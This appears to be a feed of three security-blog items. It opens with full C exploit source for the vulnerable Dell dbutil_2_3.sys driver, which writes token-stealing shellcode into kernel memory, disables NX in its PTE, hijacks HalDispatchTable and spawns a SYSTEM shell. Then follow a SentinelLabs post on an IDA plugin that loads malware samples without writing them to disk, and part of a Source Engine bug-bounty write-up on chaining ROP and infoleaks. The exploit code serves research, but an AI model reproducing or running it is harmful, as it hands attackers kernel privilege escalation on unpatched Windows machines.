  if (!baseofDrivers)
  {
    printf("[-] Error! Unable to invoke EnumDeviceDrivers(). Error: %d\n", GetLastError());
    exit(1);
  }

  // Defining number of drivers for GetDeviceDriverBaseNameA()
  drivers = lpcbNeeded / sizeof(lpImageBase[0]);

  // Parsing loaded drivers
  for (int i = 0; i < drivers; i++)
  {
    GetDeviceDriverBaseNameA(
      lpImageBase[i],
      lpFileName,
      sizeof(lpFileName) / sizeof(char)
    );

    // Keep looping, until found, to find user supplied driver base address
    if (!strcmp(name, lpFileName))
    {
      imageBase = (unsigned long long)lpImageBase[i];

      // Exit loop
      break;
    }
  }

  return imageBase;
}


void exploitWork(void)
{
  // Store the base of the kernel
  unsigned long long baseofKernel = kernelBase("ntoskrnl.exe");

  // Storing the base of the driver
  unsigned long long driverBase = kernelBase("dbutil_2_3.sys");

  // Print updates
  printf("[+] Base address of ntoskrnl.exe: 0x%llx\n", baseofKernel);
  printf("[+] Base address of dbutil_2_3.sys: 0x%llx\n", driverBase);

  // Store nt!MiGetPteAddress+0x13
  unsigned long long ntmigetpteAddress = baseofKernel + 0xbafbb;

  // Obtain a handle to the driver
  HANDLE driverHandle = CreateFileA(
    "\\\\.\\DBUtil_2_3",
    FILE_SHARE_DELETE | FILE_SHARE_READ | FILE_SHARE_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (driverHandle == INVALID_HANDLE_VALUE)
  {
    printf("[-] Error! Unable to obtain a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    printf("[+] Successfully obtained a handle to the driver. Handle value: 0x%llx\n", (unsigned long long)driverHandle);

    // Buffer to send to the driver (read primitive)
    unsigned long long inBuf1[4];

    // Values to send
    unsigned long long one1 = 0x4141414141414141;
    unsigned long long two1 = ntmigetpteAddress;
    unsigned long long three1 = 0x0000000000000000;
    unsigned long long four1 = 0x0000000000000000;

    // Assign the values
    inBuf1[0] = one1;
    inBuf1[1] = two1;
    inBuf1[2] = three1;
    inBuf1[3] = four1;

    // Interact with the driver
    DWORD bytesReturned1 = 0;

    BOOL interact = DeviceIoControl(
      driverHandle,
      IOCTL_READ_CODE,
      &inBuf1,
      sizeof(inBuf1),
      &inBuf1,
      sizeof(inBuf1),
      &bytesReturned1,
      NULL
    );

    // Error handling
    if (!interact)
    {
      printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
      exit(-1);
    }
    else
    {
      // Last member of read array should contain base of the PTEs
      unsigned long long pteBase = inBuf1[3];

      printf("[+] Base of the PTEs: 0x%llx\n", pteBase);

      // .data section of dbutil_2_3.sys contains a code cave
      unsigned long long shellcodeLocation = driverBase + 0x3010;

      // Bitwise operations to locate PTE of shellcode page
      unsigned long long shellcodePte = (unsigned long long)shellcodeLocation >> 9;
      shellcodePte = shellcodePte & 0x7FFFFFFFF8;
      shellcodePte = shellcodePte + pteBase;

      // Print update
      printf("[+] PTE of the .data page the shellcode is located at in dbutil_2_3.sys: 0x%llx\n", shellcodePte);

      // Buffer to send to the driver (read primitive)
      unsigned long long inBuf2[4];

      // Values to send
      unsigned long long one2 = 0x4141414141414141;
      unsigned long long two2 = shellcodePte;
      unsigned long long three2 = 0x0000000000000000;
      unsigned long long four2 = 0x0000000000000000;

      inBuf2[0] = one2;
      inBuf2[1] = two2;
      inBuf2[2] = three2;
      inBuf2[3] = four2;

      // Parameter for DeviceIoControl
      DWORD bytesReturned2 = 0;

      BOOL interact1 = DeviceIoControl(
        driverHandle,
        IOCTL_READ_CODE,
        &inBuf2,
        sizeof(inBuf2),
        &inBuf2,
        sizeof(inBuf2),
        &bytesReturned2,
        NULL
      );

      // Error handling
      if (!interact1)
      {
        printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
      else
      {
        // Last member of read array should contain PTE bits
        unsigned long long pteBits = inBuf2[3];

        printf("[+] PTE bits for the shellcode page: %p\n", pteBits);

        /*
          ; Windows 10 1903 x64 Token Stealing Payload
          ; Author Connor McGarr

          [BITS 64]

          _start:
            mov rax, [gs:0x188]     ; Current thread (_KTHREAD)
            mov rax, [rax + 0xb8]   ; Current process (_EPROCESS)
            mov rbx, rax        ; Copy current process (_EPROCESS) to rbx
          __loop:
            mov rbx, [rbx + 0x2f0]    ; ActiveProcessLinks
            sub rbx, 0x2f0          ; Go back to current process (_EPROCESS)
            mov rcx, [rbx + 0x2e8]    ; UniqueProcessId (PID)
            cmp rcx, 4          ; Compare PID to SYSTEM PID
            jnz __loop            ; Loop until SYSTEM PID is found

            mov rcx, [rbx + 0x360]    ; SYSTEM token is @ offset _EPROCESS + 0x360
            and cl, 0xf0        ; Clear out _EX_FAST_REF RefCnt
            mov [rax + 0x360], rcx    ; Copy SYSTEM token to current process

            xor rax, rax        ; set NTSTATUS STATUS_SUCCESS
            ret             ; Done!

        */

        // One QWORD arbitrary write
        // Shellcode is 67 bytes (67/8 = 9 unsigned long longs)
        unsigned long long shellcode1 = 0x00018825048B4865;
        unsigned long long shellcode2 = 0x000000B8808B4800;
        unsigned long long shellcode3 = 0x02F09B8B48C38948;
        unsigned long long shellcode4 = 0x0002F0EB81480000;
        unsigned long long shellcode5 = 0x000002E88B8B4800;
        unsigned long long shellcode6 = 0x8B48E57504F98348;
        unsigned long long shellcode7 = 0xF0E180000003608B;
        unsigned long long shellcode8 = 0x4800000360888948;
        unsigned long long shellcode9 = 0x0000000000C3C031;

        // Buffers to send to the driver (write primitive)
        unsigned long long inBuf3[4];
        unsigned long long inBuf4[4];
        unsigned long long inBuf5[4];
        unsigned long long inBuf6[4];
        unsigned long long inBuf7[4];
        unsigned long long inBuf8[4];
        unsigned long long inBuf9[4];
        unsigned long long inBuf10[4];
        unsigned long long inBuf11[4];

        // Values to send
        unsigned long long one3 = 0x4141414141414141;
        unsigned long long two3 = shellcodeLocation;
        unsigned long long three3 = 0x0000000000000000;
        unsigned long long four3 = shellcode1;

        unsigned long long one4 = 0x4141414141414141;
        unsigned long long two4 = shellcodeLocation + 0x8;
        unsigned long long three4 = 0x0000000000000000;
        unsigned long long four4 = shellcode2;

        unsigned long long one5 = 0x4141414141414141;
        unsigned long long two5 = shellcodeLocation + 0x10;
        unsigned long long three5 = 0x0000000000000000;
        unsigned long long four5 = shellcode3;

        unsigned long long one6 = 0x4141414141414141;
        unsigned long long two6 = shellcodeLocation + 0x18;
        unsigned long long three6 = 0x0000000000000000;
        unsigned long long four6 = shellcode4;

        unsigned long long one7 = 0x4141414141414141;
        unsigned long long two7 = shellcodeLocation + 0x20;
        unsigned long long three7 = 0x0000000000000000;
        unsigned long long four7 = shellcode5;

        unsigned long long one8 = 0x4141414141414141;
        unsigned long long two8 = shellcodeLocation + 0x28;
        unsigned long long three8 = 0x0000000000000000;
        unsigned long long four8 = shellcode6;

        unsigned long long one9 = 0x4141414141414141;
        unsigned long long two9 = shellcodeLocation + 0x30;
        unsigned long long three9 = 0x0000000000000000;
        unsigned long long four9 = shellcode7;

        unsigned long long one10 = 0x4141414141414141;
        unsigned long long two10 = shellcodeLocation + 0x38;
        unsigned long long three10 = 0x0000000000000000;
        unsigned long long four10 = shellcode8;

        unsigned long long one11 = 0x4141414141414141;
        unsigned long long two11 = shellcodeLocation + 0x40;
        unsigned long long three11 = 0x0000000000000000;
        unsigned long long four11 = shellcode9;

        inBuf3[0] = one3;
        inBuf3[1] = two3;
        inBuf3[2] = three3;
        inBuf3[3] = four3;

        inBuf4[0] = one4;
        inBuf4[1] = two4;
        inBuf4[2] = three4;
        inBuf4[3] = four4;

        inBuf5[0] = one5;
        inBuf5[1] = two5;
        inBuf5[2] = three5;
        inBuf5[3] = four5;

        inBuf6[0] = one6;
        inBuf6[1] = two6;
        inBuf6[2] = three6;
        inBuf6[3] = four6;

        inBuf7[0] = one7;
        inBuf7[1] = two7;
        inBuf7[2] = three7;
        inBuf7[3] = four7;

        inBuf8[0] = one8;
        inBuf8[1] = two8;
        inBuf8[2] = three8;
        inBuf8[3] = four8;

        inBuf9[0] = one9;
        inBuf9[1] = two9;
        inBuf9[2] = three9;
        inBuf9[3] = four9;

        inBuf10[0] = one10;
        inBuf10[1] = two10;
        inBuf10[2] = three10;
        inBuf10[3] = four10;

        inBuf11[0] = one11;
        inBuf11[1] = two11;
        inBuf11[2] = three11;
        inBuf11[3] = four11;

        DWORD bytesReturned3 = 0;
        DWORD bytesReturned4 = 0;
        DWORD bytesReturned5 = 0;
        DWORD bytesReturned6 = 0;
        DWORD bytesReturned7 = 0;
        DWORD bytesReturned8 = 0;
        DWORD bytesReturned9 = 0;
        DWORD bytesReturned10 = 0;
        DWORD bytesReturned11 = 0;

        BOOL interact2 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf3,
          sizeof(inBuf3),
          &inBuf3,
          sizeof(inBuf3),
          &bytesReturned3,
          NULL
        );

        BOOL interact3 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf4,
          sizeof(inBuf4),
          &inBuf4,
          sizeof(inBuf4),
          &bytesReturned4,
          NULL
        );

        BOOL interact4 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf5,
          sizeof(inBuf5),
          &inBuf5,
          sizeof(inBuf5),
          &bytesReturned5,
          NULL
        );

        BOOL interact5 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf6,
          sizeof(inBuf6),
          &inBuf6,
          sizeof(inBuf6),
          &bytesReturned6,
          NULL
        );

        BOOL interact6 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf7,
          sizeof(inBuf7),
          &inBuf7,
          sizeof(inBuf7),
          &bytesReturned7,
          NULL
        );

        BOOL interact7 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf8,
          sizeof(inBuf8),
          &inBuf8,
          sizeof(inBuf8),
          &bytesReturned8,
          NULL
        );

        BOOL interact8 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf9,
          sizeof(inBuf9),
          &inBuf9,
          sizeof(inBuf9),
          &bytesReturned9,
          NULL
        );

        BOOL interact9 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf10,
          sizeof(inBuf10),
          &inBuf10,
          sizeof(inBuf10),
          &bytesReturned10,
          NULL
        );

        BOOL interact10 = DeviceIoControl(
          driverHandle,
          IOCTL_WRITE_CODE,
          &inBuf11,
          sizeof(inBuf11),
          &inBuf11,
          sizeof(inBuf11),
          &bytesReturned11,
          NULL
        );

        // A lot of error handling
        if (!interact2 || !interact3 || !interact4 || !interact5 || !interact6 || !interact7 || !interact8 || !interact9 || !interact10)
        {
          printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          exit(-1);
        }
        else
        {
          printf("[+] Successfully wrote the shellcode to the .data section of dbutil_2_3.sys at address: 0x%llx\n", shellcodeLocation);

          // Clear the no-eXecute bit
          unsigned long long taintedPte = pteBits & 0x0FFFFFFFFFFFFFFF;

          printf("[+] Corrupted PTE bits for the shellcode page: %p\n", taintedPte);

          // Clear the no-eXecute bit in the actual PTE
          // Buffer to send to the driver (write primitive)
          unsigned long long inBuf13[4];

          // Values to send
          unsigned long long one13 = 0x4141414141414141;
          unsigned long long two13 = shellcodePte;
          unsigned long long three13 = 0x0000000000000000;
          unsigned long long four13 = taintedPte;

          // Assign the values
          inBuf13[0] = one13;
          inBuf13[1] = two13;
          inBuf13[2] = three13;
          inBuf13[3] = four13;


          // Interact with the driver
          DWORD bytesReturned13 = 0;

          BOOL interact12 = DeviceIoControl(
            driverHandle,
            IOCTL_WRITE_CODE,
            &inBuf13,
            sizeof(inBuf13),
            &inBuf13,
            sizeof(inBuf13),
            &bytesReturned13,
            NULL
          );

          // Error handling
          if (!interact12)
          {
            printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
          }
          else
          {
            printf("[+] Successfully corrupted the PTE of the shellcode page! The kernel mode page holding the shellcode should now be RWX!\n");

            // Offset to nt!HalDispatchTable+0x8
            unsigned long long halDispatch = baseofKernel + 0x427258;

            // Use arbitrary read primitive to preserve nt!HalDispatchTable+0x8
            // Buffer to send to the driver (write primitive)
            unsigned long long inBuf14[4];

            // Values to send
            unsigned long long one14 = 0x4141414141414141;
            unsigned long long two14 = halDispatch;
            unsigned long long three14 = 0x0000000000000000;
            unsigned long long four14 = 0x0000000000000000;

            // Assign the values
            inBuf14[0] = one14;
            inBuf14[1] = two14;
            inBuf14[2] = three14;
            inBuf14[3] = four14;

            // Interact with the driver
            DWORD bytesReturned14 = 0;

            BOOL interact13 = DeviceIoControl(
              driverHandle,
              IOCTL_READ_CODE,
              &inBuf14,
              sizeof(inBuf14),
              &inBuf14,
              sizeof(inBuf14),
              &bytesReturned14,
              NULL
            );

            // Error handling
            if (!interact13)
            {
              printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
            }
            else
            {
              // Last member of read array should contain preserved nt!HalDispatchTable+0x8 value
              unsigned long long preservedHal = inBuf14[3];

              printf("[+] Preserved nt!HalDispatchTable+0x8 value: 0x%llx\n", preservedHal);

              // Leveraging arbitrary write primitive to overwrite nt!HalDispatchTable+0x8
              // Buffer to send to the driver (write primitive)
              unsigned long long inBuf15[4];

              // Values to send
              unsigned long long one15 = 0x4141414141414141;
              unsigned long long two15 = halDispatch;
              unsigned long long three15 = 0x0000000000000000;
              unsigned long long four15 = shellcodeLocation;

              // Assign the values
              inBuf15[0] = one15;
              inBuf15[1] = two15;
              inBuf15[2] = three15;
              inBuf15[3] = four15;

              // Interact with the driver
              DWORD bytesReturned15 = 0;

              BOOL interact14 = DeviceIoControl(
                driverHandle,
                IOCTL_WRITE_CODE,
                &inBuf15,
                sizeof(inBuf15),
                &inBuf15,
                sizeof(inBuf15),
                &bytesReturned15,
                NULL
              );

              // Error handling
              if (!interact14)
              {
                printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
              }
              else
              {
                printf("[+] Successfully overwrote the pointer at nt!HalDispatchTable+0x8!\n");

                // Locating nt!NtQueryIntervalProfile
                NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(
                  GetModuleHandle(
                    TEXT("ntdll.dll")),
                  "NtQueryIntervalProfile"
                );

                // Error handling
                if (!NtQueryIntervalProfile)
                {
                  printf("[-] Error! Unable to find ntdll!NtQueryIntervalProfile! Error: %d\n", GetLastError());
                  exit(1);
                }
                else
                {
                  // Print update for found ntdll!NtQueryIntervalProfile
                  printf("[+] Located ntdll!NtQueryIntervalProfile at: 0x%llx\n", NtQueryIntervalProfile);

                  // Calling nt!NtQueryIntervalProfile
                  ULONG exploit = 0;

                  NtQueryIntervalProfile(
                    0x1234,
                    &exploit
                  );

                  // Restoring nt!HalDispatchTable+0x8
                  // Buffer to send to the driver (write primitive)
                  unsigned long long inBuf16[4];

                  // Values to send
                  unsigned long long one16 = 0x4141414141414141;
                  unsigned long long two16 = halDispatch;
                  unsigned long long three16 = 0x0000000000000000;
                  unsigned long long four16 = preservedHal;

                  // Assign the values
                  inBuf16[0] = one16;
                  inBuf16[1] = two16;
                  inBuf16[2] = three16;
                  inBuf16[3] = four16;

                  // Interact with the driver
                  DWORD bytesReturned16 = 0;

                  BOOL interact15 = DeviceIoControl(
                    driverHandle,
                    IOCTL_WRITE_CODE,
                    &inBuf16,
                    sizeof(inBuf16),
                    &inBuf16,
                    sizeof(inBuf16),
                    &bytesReturned16,
                    NULL
                  );

                  // Error handling
                  if (!interact15)
                  {
                    printf("[-] Error! Unable to interact with the driver. Error: 0x%lx\n", GetLastError());
                  }
                  else
                  {
                    printf("[+] Successfully restored the pointer at nt!HalDispatchTable+0x8!\n");
                    printf("[+] Enjoy the NT AUTHORITY\\SYSTEM shell!\n");

                    // Spawning an NT AUTHORITY\SYSTEM shell
                    system("cmd.exe /c cmd.exe /K cd C:\\");
                  }
                }
              }
            }
          }
        }
      }
    }
  }
}

// Call exploitWork()
void main(void)
{
  exploitWork();
}
☑ ★ ✇ SentinelLabs

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

By: Roman Rusetsky

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. If the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL executable, where the memory loading capabilities are stored. Its main functionally is to take a buffer of bytes from a memory buffer and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the zip files and allow you to choose the file you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk and storing the encrypted zip file on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the loaders in the loaders directory of IDA.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  • Place the memory loader DLL in the IDA directory folder.
    1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

  1. Open IDA and choose zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files from the zip will be displayed:
  4. IDA will then use the loader code and load it as if the binary was a local file on the system.

UrlLoader:

  1. Open any file on your computer in a directory you have write privileges to.
  2. The UrlLoader will suggest a file to open.
  3. After you chose UrlLoader, you will be asked enter a URL:
  4. The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it was a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
    3. accept_file – this function returns a boolean if the loader is relevant to the current binary that is being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

  1. The project can be compiled into two versions x64 for IDA with x64 addresses, and x64 for IDA x64 with 32 bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64 bit IDA with 64 BIT addresses
    2. X32 | X64 – 64 bit IDA with 32 BIT addresses

 

  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files: (Similar in: (X64 | x64) and( X64 | X32)
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
  • X64 | X32
    1. idasdk75\lib\x64_win_vc_32
    2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
  • Conclusion

    When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that the endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

    Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro often a different environment is created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

    Please note that a IDA professional license is needed to use and develop extensions for IDA Pro.

    The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

 

The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

☑ ★ ✇ Reversing Engineering for the Soul

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

